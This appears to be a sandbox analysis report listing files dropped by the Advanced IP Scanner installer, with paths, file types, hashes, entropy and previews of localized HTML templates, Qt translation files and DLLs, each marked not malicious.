Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.790118218856679
Encrypted:	false
SSDEEP:	24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
MD5:	5AD712B9C416EE21623D620AB6019FB4
SHA1:	51DF096A58D6DF2A7CE33E22511C671883F2228C
SHA-256:	38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
SHA-512:	608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent

C:\Program Files (x86)\Advanced IP Scanner\is-S75TV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27834
Entropy (8bit):	4.7072414399522335
Encrypted:	false
SSDEEP:	384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
MD5:	A3264DCBED0CEFC981230E4CCADF8807
SHA1:	0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
SHA-256:	6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
SHA-512:	7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7...e..Z.......Z........6. =...Fo..y......y...]..%..$...0..$..+.....G.+.......+....x.+......+....&..G.... ..G......H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.\|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-S95E4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.128056579045673
Encrypted:	false
SSDEEP:	24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
MD5:	1C7DAA7B7C3119E37B599739F3372A97
SHA1:	D8E90B30F5D754C8B7623CF6FE3E5D298E620201
SHA-256:	DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
SHA-512:	ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..

C:\Program Files (x86)\Advanced IP Scanner\is-SBQ2U.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.138597371923522
Encrypted:	false
SSDEEP:	24:lFo/rhtCtunH/XqHH39/g/0Kt5RGDIygReEhyv:HuStyfXqHHN/g/0U2DIPs
MD5:	280FFC27B6422BD266F49BE7798DB4D9
SHA1:	203F0E4D50B553133531D25727397417BBABAA7B
SHA-256:	5DC9054AD67076F853743C7512BEC17071EF732A13B6BE5D0C18A39F7DBF32C6
SHA-512:	B446D3B2C1FA4F4D04AD62CAE6AC64023054B32669912B1586950B6C80751F99968AF7AA759EF05826D88BDB6670A1737717A1854872BF4214220BAEAC8C3311
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.......... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP-......:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC-......:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>........:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\is-SCCPB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1180200
Entropy (8bit):	6.806814022865445
Encrypted:	false
SSDEEP:	24576:cC5LQc2ki3TeGT5jWZKbROjq69Afqg0tPoqqHVd4qP02mn:cOB21uZKbR0DACg0tPSVyR2mn
MD5:	C553D46852C7015A3DF581FBD2C02C3A
SHA1:	D768260F818EA400BE5AD8F86280FB92DD37F341
SHA-256:	F90FC5CD84EFE1F5AF152DF3FC95306782384DCBC738E5C383E705025C3B837B
SHA-512:	42FBFE51991BA7FCAECADFED89AADCD3EDA74E63FD80E4FE630EB6E4957DB179CC1B32F7CB46F5AFA4749E461CF4E11A723172DAF4035EE1FB3AF60D49F531A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.....:.h.;...:.h.?...:.h.>...:.h.9...:..;...:...;.n.:..<...:......:..>...:..:...:......:..8...:.Rich..:.........................PE..L......]...........!.........p......?........................................@.......3....@.........................p?......l...h.......@...............(..........P9..T............................9..@...............d............................text............................... ..`.rdata...C.......D..................@..@.data...<........^..................@....rsrc...@............@..............@..@.reloc..............F..............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-SF594.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.04628745407397
Encrypted:	false
SSDEEP:	192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
MD5:	07954AF744363F9807355E4E9408DF45
SHA1:	B37D06B39EB7186B55CEAE25427B7AB95E46E32F
SHA-256:	4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
SHA-512:	B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-SOP7H.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28669
Entropy (8bit):	4.635479137963866
Encrypted:	false
SSDEEP:	384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
MD5:	A5D24342E9B32AD9714C091BB135D180
SHA1:	7B193290CFE8190B60122C2219972512695E5D68
SHA-256:	2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
SHA-512:	140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
Malicious:	false
Preview:	<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK..y......y......%..&...0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.\|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V.....R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-T1SL1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1177
Entropy (8bit):	4.903797892947706
Encrypted:	false
SSDEEP:	24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
MD5:	5F29203D51A1A790B22063DE29E377AC
SHA1:	C0EDB2A7108E532E66D7B730466022403C64F50D
SHA-256:	C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
SHA-512:	D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

C:\Program Files (x86)\Advanced IP Scanner\is-T7QJD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:	dropped
Size (bytes):	25214
Entropy (8bit):	5.181706176676903
Encrypted:	false
SSDEEP:	192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
MD5:	3511FCBA762713FBC4D83979F300A383
SHA1:	61C33483A70C253FF38222021AD05E599F11E05C
SHA-256:	AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
SHA-512:	2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
Malicious:	false
Preview:	..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-TPUU9.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21326
Entropy (8bit):	5.601982778539758
Encrypted:	false
SSDEEP:	384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
MD5:	B961B562628E357221F12EB6A212860C
SHA1:	35E6905D0410CEDC12B77EA8735CEDCB74913B25
SHA-256:	5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
SHA-512:	8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
Malicious:	false
Preview:	<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3...y......y......%...F..0...q.+.......+......+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.\|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&........5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

C:\Program Files (x86)\Advanced IP Scanner\is-TSVHT.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26887
Entropy (8bit):	4.711499642917058
Encrypted:	false
SSDEEP:	768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
MD5:	D0C083D4760D44DB80A0AEDE7862D5EC
SHA1:	155B7B067596D105B0BC4471BD654F1D9B720D20
SHA-256:	186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
SHA-512:	B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
Malicious:	false
Preview:	<.d....!..`...B..........U....;.......;...U...;...g...;.. ....;..@....O..W....[..S....^...)...^..O...(5......G.......H,..L...K...=H..N:......V...B..._...X.......'.......M....y..M................d......T....t..)5...t..M....t..W......>....j...5..5t......@...?...H5..U...f....I......B........i.......%...~..1<...`..5 ...e..W.......W+......... =...C...y......y...3..%..#v..0..#..+.....s.+.......+......+......+....%Q.G.....A.G....)..H0...WW.Hw9...C.Hw9...s.I....'<.J6......J6......J6......J6...F/.LD......L.b..W..M.S..>..R.....".V.....o.Wi...V..W.T.....Z.\|..N..[f3..R^.gc....N.w0K..D...H...$Q......Xz...T......."..2....~..4... d..C=...T..,...2...........V ......\K.9.E..=..L.#..^..M$o.....e.......l8...4i...^..Fb..I....8......@.......O.......U...>......>...f..3..-...l...G.......7..5.l..[9.AV...&..y....T%...0..PT......OM......Uy..tb..3........?.......g......P.......:.......K..(....O..1V...(..R....0;.W.<..[..f.~.. .......2...1........^..3....5..........x...c..C..;6...]m.q.J..Lh..I....O..I

C:\Program Files (x86)\Advanced IP Scanner\is-UBTCO.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28836
Entropy (8bit):	5.274937745581086
Encrypted:	false
SSDEEP:	768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
MD5:	EE64BC556D9E554E5122531BBA368240
SHA1:	C691C2D832157EF9FD50F0D2C5B91EA9B6934979
SHA-256:	11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
SHA-512:	23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
Malicious:	false
Preview:	<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I...y......y......%..&...0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.\|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V.....R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I

C:\Program Files (x86)\Advanced IP Scanner\is-UMBR1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	24993
Entropy (8bit):	5.35342565714326
Encrypted:	false
SSDEEP:	384:6vsXcNgywHOUW6MAlHWknGhq984qSDPGZbGCeozTGAGaj:8gywHOUXMAlHWknOqi+G5GC9
MD5:	3928085E21EA3A08476A8FF476B3DF1E
SHA1:	811D18C1C6F92CB49902E060E5C47700D5AF87B1
SHA-256:	A5D01162A23EE399F78DCFE1717BAA140BAB5CC4F099699DE000FCA923097790
SHA-512:	0ED2A612815E1632D037F0651B70AB8797EA5B9CF06B040EFE1DE5805F0F6E50A3BFA84F2A28A7A45156C2141BA5A5FE1CAC99260BBAAC1A0B25DE1929747F40
Malicious:	false
Preview:	<.d....!..`...B..........N0...;.......;...w...;.......;.......;..; ...O..P....[..L....^..C...^..IB..(5......G.......H,..F...K...7...N:......V...<o.._...Q.......$J......F....y..G/.......?..............N....t..%....t..G....t..Pm.....8....j......5t...+..@...:E..H5..N...f...g......=........).......Q...~..,....`..0n...e..O.......P.......... =...>...y......y......%.. ...0.. ..+.......+.....6.+......+....l.+...."G.G.......G....&..H0...PI.Hw9.....Hw9.....I....#..J6......J6....<.J6......J6...@s.LD....T.L.b..P..M.S..8..R.....<.V......Wi...O..W.T.....Z.\|..HA.[f3..K..gc....^.w0K..?$..H...!i......Q^...T......."...`...~..0... d..=....T..(...2...........O"......T..9.E..8..L.#..Ws.M$o...8.e.....f.l8.../....^..@...I..........:p......H.......N...>......>......3..)...l...A.......2..5.l..S..AV...#..y....M_...0..I.......H.......N...tb..........................J.......5.......Ez.(....Il.1V...$..R....+..W.<..Tg.f.~...H..........1........^../E...5..............c..=..;6...U..q.J..F6..I....y..I

C:\Program Files (x86)\Advanced IP Scanner\is-UOE1C.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28357
Entropy (8bit):	4.7436866012778625
Encrypted:	false
SSDEEP:	384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
MD5:	45864510329D981D80C616641357FEFF
SHA1:	C4EB7D6D98D29656FA2DE8E9923750556408E865
SHA-256:	3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
SHA-512:	93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G...y......y......%..%~..0..%..+.....;.+......+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.\|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I

C:\Program Files (x86)\Advanced IP Scanner\is-US4L4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.788912446448768
Encrypted:	false
SSDEEP:	24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
MD5:	FBA663967DF5DD4AB38D38DA1362598E
SHA1:	9557B768C03EB179FDEBB5F74724985F51685203
SHA-256:	466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
SHA-512:	427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

C:\Program Files (x86)\Advanced IP Scanner\is-UUCTA.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29376
Entropy (8bit):	6.5989266511221745
Encrypted:	false
SSDEEP:	384:K47isbM4Oe5grykfIgTmLSW2hWPgbCA0GftpBjF17cylBRAkV8:X1Mq5grxfInqH8iBgoRAz
MD5:	D0D380AF839124368A96D6AA82C7C8AE
SHA1:	E2AC42F829085E0E5BEEA29FCFF09E467810A777
SHA-256:	06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5
SHA-512:	DAF3997922E18C0BE088A15209C9F01CC1DDA90972A6AADCF76DE867B85D34483AD5E138E3FA321C7140BF8E455C2B908D0A4DB6A9E35011786398656B886479
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................@...............................P.......,....@..............................+...........@...............6...<..............8............................................................................text....,.......................... ..`.rsrc........@.......2..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-V4FHL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27649
Entropy (8bit):	4.760709648438812
Encrypted:	false
SSDEEP:	384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
MD5:	C41CF1ECCEF6EB2CB6BBAF02A383BC28
SHA1:	B2E5D8721D04232F7219AC00496379C14576E33D
SHA-256:	61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
SHA-512:	341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
Malicious:	false
